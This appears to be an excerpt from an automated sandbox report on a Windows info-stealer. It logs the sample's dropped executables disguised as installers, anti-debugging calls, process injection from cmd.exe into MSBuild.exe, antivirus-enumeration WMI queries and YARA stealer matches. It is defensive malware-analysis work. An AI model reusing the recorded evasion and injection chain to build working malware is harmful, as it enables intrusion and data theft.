                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_00409C06 SetUnhandledExceptionFilter,0_2_00409C06
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409EBE
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041073B
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_04329CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04329CDA
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_04329E6D SetUnhandledExceptionFilter,0_2_04329E6D
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0432A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0432A125
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_043309A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_043309A2
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00419DC7 SetUnhandledExceptionFilter,10_2_00419DC7
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00417B4E
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004173DD
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C22B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6C22B66C
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C22B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6C22B1F7
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3DAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6C3DAC62
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0096C1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0096C1FD
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_00976678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00976678
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_6C922782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_6C922782
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_6C9290E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_6C9290E9
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeNtQuerySystemInformation: Direct from: 0x456867Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeNtQuerySystemInformation: Direct from: 0x8F5BE4
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeNtQuerySystemInformation: Direct from: 0x6CEC2AB4Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeNtSetInformationThread: Direct from: 0x6CD58C4C
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeNtQuerySystemInformation: Direct from: 0x865BE4Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeNtSetInformationThread: Direct from: 0x6C838C4CJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,10_2_00415D00
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6AF01000
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 4CB008
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6AF01000
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: ED5008
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess created: C:\Users\user\AppData\Local\Temp\u48o.0.exe "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user~1\AppData\Local\Temp\Qg_Appv5.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess created: C:\Users\user\AppData\Local\Temp\u48o.1.exe "C:\Users\user~1\AppData\Local\Temp\u48o.1.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe C:\Users\user~1\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user~1\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_6C833470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,18_2_6C833470
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_6C833470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,18_2_6C833470
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: TrayNotifyWndShell_TrayWnd
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWndtooltips_class32SVWU
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWndtooltips_class32S
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_00409D1B cpuid 0_2_00409D1B
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00420063
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetLocaleInfoW,0_2_004208CE
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: EnumSystemLocalesW,0_2_004170F1
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0042099B
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: EnumSystemLocalesW,0_2_004202DB
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: EnumSystemLocalesW,0_2_00420326
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: EnumSystemLocalesW,0_2_004203C1
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0042044E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetLocaleInfoW,0_2_004174E4
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetLocaleInfoW,0_2_0042069E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004207C7
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_04340C02
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: EnumSystemLocalesW,0_2_04340542
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: EnumSystemLocalesW,0_2_0434058D
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: EnumSystemLocalesW,0_2_04340628
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetLocaleInfoW,0_2_0433774B
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetLocaleInfoW,0_2_04340905
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetLocaleInfoW,0_2_04340903
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_04340A2E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_043402CA
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: GetLocaleInfoW,0_2_04340B35
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: EnumSystemLocalesW,0_2_04337358
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,10_2_00414570
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeQueries volume information: C:\Users\user\AppData\Local\Temp\d6072408 VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040996D
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,10_2_004143C0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,10_2_004144B0
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_00872DA6 _memset,GetVersionExW,18_2_00872DA6
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.5c90e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.5c90e67.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.3.u48o.0.exe.5cc0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25659b50000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25659b50000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000000.1530072053.00000256544FB000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                            Source: Yara matchFile source: 31.2.cmd.exe.5ac00c8.7.raw.unpack, type: UNPACKEDPE
